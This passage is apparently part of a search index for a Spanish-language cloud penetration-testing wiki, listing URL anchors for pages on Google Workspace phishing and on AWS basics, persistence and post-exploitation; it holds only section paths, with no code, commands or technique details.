hat","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#phishing-en-google-docs","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#phishing-en-google-calendar","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#phishing-de-redirección-con-scripts-de-apps","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#phishing-de-oauth-de-app-scripts","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#phishing-de-apps-oauth","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#aviso-de-aplicación-no-verificada","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#scopes-interesantes","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#crear-una-aplicación-oauth","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#referencias","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#gws---app-scripts","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#app-scripts","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#crear-app-script","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#escenario-de-app-script","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#crear-google-sheet-con-app-script","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#filtrar-token","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#crear-trigger","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#compartir","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#abusando-de-documentos-compartidos-conmigo","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#copiar-en-lugar-de-compartir","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#compartir-como-aplicación-web","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#pruebas","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#app-script-como-persistencia","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#bypass-de-aviso-no-verificado-en-documento-compartido","pentesting-cloud/aws-security/index.html#aws-pentesting","pentesting-cloud/aws-security/index.html#información-básica","pentesting-cloud/aws-security/index.html#laboratorios-para-aprender","pentesting-cloud/aws-security/index.html#metodología-de-pentesterred-team-de-aws","pentesting-cloud/aws-security/index.html#enumeración-básica","pentesting-cloud/aws-security/index.html#ssrf","pentesting-cloud/aws-security/index.html#whoami","pentesting-cloud/aws-security/index.html#enumeración-de-organizaciones","pentesting-cloud/aws-security/index.html#enumeración-de-iam","pentesting-cloud/aws-security/index.html#enumeración-de-servicios-post-explotación-y-persistencia","pentesting-cloud/aws-security/index.html#escalación-de-privilegios","pentesting-cloud/aws-security/index.html#servicios-expuestos-públicamente","pentesting-cloud/aws-security/index.html#comprometiendo-la-organización","pentesting-cloud/aws-security/index.html#desde-la-cuenta-raízadministrativa","pentesting-cloud/aws-security/index.html#herramientas-automáticas","pentesting-cloud/aws-security/index.html#recon","pentesting-cloud/aws-security/index.html#privesc--exploiting","pentesting-cloud/aws-security/index.html#auditoría","pentesting-cloud/aws-security/index.html#auditoría-constante","pentesting-cloud/aws-security/index.html#debug-capturar-solicitudes-de-aws-cli","pentesting-cloud/aws-security/index.html#referencias","pentesting-cloud/aws-security/aws-basic-information/index.html#aws---información-básica","pentesting-cloud/aws-security/aws-basic-information/index.html#jerarquía-de-organización","pentesting-cloud/aws-security/aws-basic-information/index.html#cuentas","pentesting-cloud/aws-security/aws-basic-information/index.html#unidades-de-organización","pentesting-cloud/aws-security/aws-basic-information/index.html#service-control-policy-scp","pentesting-cloud/aws-security/aws-basic-information/index.html#resource-control-policy-rcp","pentesting-cloud/aws-security/aws-basic-information/index.html#arn","pentesting-cloud/aws-security/aws-basic-information/index.html#iam---identity-and-access-management","pentesting-cloud/aws-security/aws-basic-information/index.html#aws-account-root-user","pentesting-cloud/aws-security/aws-basic-information/index.html#iam-users","pentesting-cloud/aws-security/aws-basic-information/index.html#mfa---multi-factor-authentication","pentesting-cloud/aws-security/aws-basic-information/index.html#grupos-de-usuarios-de-iam","pentesting-cloud/aws-security/aws-basic-information/index.html#roles-de-iam","pentesting-cloud/aws-security/aws-basic-information/index.html#credenciales-temporales-en-iam","pentesting-cloud/aws-security/aws-basic-information/index.html#políticas","pentesting-cloud/aws-security/aws-basic-information/index.html#límites-de-iam","pentesting-cloud/aws-security/aws-basic-information/index.html#políticas-de-sesión","pentesting-cloud/aws-security/aws-basic-information/index.html#federación-de-identidad","pentesting-cloud/aws-security/aws-basic-information/index.html#centro-de-identidad-iam","pentesting-cloud/aws-security/aws-basic-information/index.html#confianzas-y-roles-entre-cuentas","pentesting-cloud/aws-security/aws-basic-information/index.html#aws-simple-ad","pentesting-cloud/aws-security/aws-basic-information/index.html#otras-opciones-de-iam","pentesting-cloud/aws-security/aws-basic-information/index.html#prefijos-de-id-de-iam","pentesting-cloud/aws-security/aws-basic-information/index.html#permisos-recomendados-para-auditar-cuentas","pentesting-cloud/aws-security/aws-basic-information/index.html#varios","pentesting-cloud/aws-security/aws-basic-information/index.html#autenticación-cli","pentesting-cloud/aws-security/aws-basic-information/index.html#referencias","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#aws---abuso-de-federación","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#saml","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#oidc---abuso-de-github-actions","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#the-workflow-should-only-trigger-on-pull-requests-to-the-main-branch","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#required-to-get-the-id-token-that-will-be-used-for-oidc","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#crate-an-eks-cluster-10min","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#create-an-identity-provider-for-an-eks-cluster","pentesting-cloud/aws-security/aws-permissions-for-a-pentest.html#aws---permisos-para-un-pentest","pentesting-cloud/aws-security/aws-persistence/index.html#aws---persistencia","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#aws---persistencia-de-api-gateway","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#api-gateway","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#política-de-recursos","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#modificar-autorizadores-de-lambda","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#permisos-de-iam","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#claves-de-api","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#aws---persistencia-de-cognito","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#cognito","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#persistencia-de-usuario","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#cognito-idpsetriskconfiguration","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#aws---persistencia-en-dynamodb","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#dynamodb","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#disparadores-de-dynamodb-con-puerta-trasera-de-lambda","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#dynamodb-como-un-canal-c2","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#aws---ec2-persistencia","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#ec2","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#persistencia-de-seguimiento-de-conexiones-del-grupo-de-seguridad","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#administrador-del-ciclo-de-vida-de-ec2","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#instancias-programadas","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#solicitud-de-flota-spot","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#instancias-de-puerta-trasera","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#configuración-de-lanzamiento-de-puerta-trasera","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#vpn","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#peering-de-vpc","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#aws---ecr-persistence","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#ecr","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#imagen-de-docker-oculta-con-código-malicioso","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#política-del-repositorio","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#política-de-registro-y-replicación-entre-cuentas","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#aws---persistencia-en-ecs","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#ecs","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#tarea-periódica-oculta-de-ecs","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#contenedor-de-puerta-trasera-en-la-definición-de-tarea-ecs-existente","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#servicio-ecs-no-documentado","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#aws---elastic-beanstalk-persistence","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#persistencia-en-la-instancia","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#puerta-trasera-en-la-versión","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#nueva-versión-con-puerta-trasera","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#abusando-de-los-ganchos-del-ciclo-de-vida-de-recursos-personalizados","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#aws---efs-persistence","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#efs","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#modificar-la-política-de-recursos--grupos-de-seguridad","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#crear-punto-de-acceso","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#aws---iam-persistence","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#iam","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#persistencia-común-de-iam","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#políticas-de-confianza-de-rol-de-puerta-trasera","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#versión-de-política-de-puerta-trasera","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#puerta-trasera--crear-proveedor-de-identidad","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#aws---kms-persistence","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#kms","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#conceder-acceso-a-través-de-políticas-de-kms","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#grant-eterno","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#aws---persistencia-de-lambda","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#lambda","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#persistencia-de-lambda-layer","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#persistencia-de-extensiones-de-lambda","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#a-través-de-políticas-de-recursos","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#versiones-alias-y-pesos","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#puerta-trasera-de-versión--api-gateway","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#actuador-cronevent","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#aws---abusando-de-las-extensiones-de-lambda","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#extensiones-de-lambda","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#extensión-externa-para-persistencia-robo-de-solicitudes-y-modificación-de-solicitudes","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#referencias","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#aws---persistencia-de-capas-de-lambda","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#capas-de-lambda","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#ruta-de-carga-de-python","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#bibliotecas-pre-cargadas","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#inyección-en-la-capa-de-lambda","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#capas-externas","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#aws---persistencia-en-lightsail","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#lightsail","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#descargar-claves-ssh-de-la-instancia-y-contraseñas-de-la-base-de-datos","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#instancias-con-puerta-trasera","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#persistencia-dns","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#aws---persistencia-en-rds","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#rds","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#hacer-que-la-instancia-sea-accesible-públicamente-rdsmodifydbinstance","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#crear-un-usuario-administrador-dentro-de-la-db","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#hacer-la-instantánea-pública","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#aws---s3-persistence","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#s3","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#kms-client-side-encryption","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#using-s3-acls","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#aws---sns-persistence","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#sns","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#persistence","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#crear-suscriptores","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#aws---persistencia-de-secrets-manager","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#secrets-manager","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#a-través-de-políticas-de-recursos","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#a-través-de-lambda-de-rotación-de-secretos","pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.html#aws---sqs-persistence","pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.html#sqs","pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.html#usando-la-política-de-recursos","pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.html#aws---ssm-persistencia","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#aws---persistencia-de-step-functions","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#step-functions","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#inyección-de-backdoor-en-step-functions","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#inyección-de-backdoor-en-alias","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#aws---sts-persistence","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#sts","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#token-de-rol-asumido","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#malabarismo-de-cadenas-de-roles","pentesting-cloud/aws-security/aws-post-exploitation/index.html#aws---post-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#aws---api-gateway-post-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#api-gateway","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#acceder-a-apis-no-expuestas","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#eludir-el-paso-del-cuerpo-de-la-solicitud","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#uso-de-planes-dos","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayupdategatewayresponse-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayupdatestage-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayputmethodresponse-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayupdaterestapi-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewaycreateapikey-apigatewayupdateapikey-apigatewaycreateusageplan-apigatewaycreateusageplankey","pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.html#aws---cloudfront-post-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.html#cloudfront","pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.html#hombre-en-el-medio","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#aws---codebuild-post-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuild","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#verificar-secretos","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#abusar-del-acceso-al-repositorio-de-codebuild","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#filtrando-tokens-de-acceso-desde-aws-codebuild","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuilddeleteproject","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuildtagresource--codebuilduntagresource","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuilddeletesourcecredentials","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#aws-codebuild---token-leakage","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#recuperar-tokens-configurados-de-githubbitbucket","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#a-través-de-la-imagen-de-docker","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#via-insecuressl","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#a-través-del-protocolo-http","pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.html#aws---control-tower-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.html#control-tower","pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.html#habilitar--deshabilitar-controles","pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.html#aws---dlm-post-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.html#administrador-del-ciclo-de-vida-de-datos-dlm","pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.html#ec2describevolumes-dlmcreatelifecyclepolicy","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#aws---dynamodb-post-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodb","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbbatchgetitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbgetitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbquery","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbscan","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbpartiqlselect","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbexporttabletopointintimedynamodbupdatecontinuousbackups","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbcreatetable-dynamodbrestoretablefrombackup-dynamodbcreatebackup","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbputitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbupdateitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbdeletetable","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbdeletebackup","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbstreamspecification-dynamodbupdatetable-dynamodbdescribestream-dynamodbgetsharditerator-dynamodbgetrecords","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#aws---ec2-ebs-ssm-y-vpc-post-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ec2-y-vpc","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#espejo-vpc-malicioso----ec2describeinstances-ec2runinstances-ec2createsecuritygroup-ec2authorizesecuritygroupingress-ec2createtrafficmirrortarget-ec2createtrafficmirrorsession-ec2createtrafficmirrorfilter-ec2createtrafficmirrorfilterrule","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#copiar-instancia-en-ejecución","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ebs-snapshot-dump","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#exfiltración-de-datos","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#grupo-de-seguridad-abierto","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#privesc-to-ecs","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#remove-vpc-flow-logs","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ssm-port-forwarding","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#share-ami","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#buscar-información-sensible-en-amis-públicas-y-privadas","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#compartir-instantánea-de-ebs","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ebs-ransomware-poc","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#aws---ebs-snapshot-dump","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#comprobando-un-snapshot-localmente","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#comprobando-un-snapshot-en-aws","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#comprobando-un-snapshot-en-aws-usando-cli","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#shadow-copy","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#references","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.html#aws---espejo-vpc-malicioso","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#aws---ecr-post-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#ecr","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#iniciar-sesión-descargar-y-subir","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#ecrputlifecyclepolicy--ecrdeleterepository--ecr-publicdeleterepository--ecrbatchdeleteimage--ecr-publicbatchdeleteimage","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#aws---ecs-post-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#ecs","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#roles-iam-de-host","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#privesc-a-nodo-para-robar-credenciales-y-secretos-de-otros-contenedores","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#robar-información-sensible-de-contenedores-ecr","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#aws---efs-post-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#efs","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemdeletemounttarget","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemdeletefilesystem","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemupdatefilesystem","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemcreateaccesspoint-y-elasticfilesystemdeleteaccesspoint","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#aws---eks-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#eks","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#enumerar-el-clúster-desde-la-consola-de-aws","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#conectar-al-clúster-de-kubernetes-de-aws","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#de-aws-a-kubernetes","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#de-kubernetes-a-aws","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#obtener-el-endpoint-del-api-server-desde-un-token-jwt","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#bypass-cloudtrail","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#eks-ransom","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#aws---elastic-beanstalk-post-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkdeleteapplicationversion","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkterminateenvironment","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkdeleteapplication","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkswapenvironmentcnames","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkaddtags-elasticbeanstalkremovetags","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#aws---iam-post-explotación","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#iam","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#problema-del-diputado-confundido","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#confianzas-inesperadas","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#referencias","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#aws---kms-post-explotación","pentesting-cloud/aws-se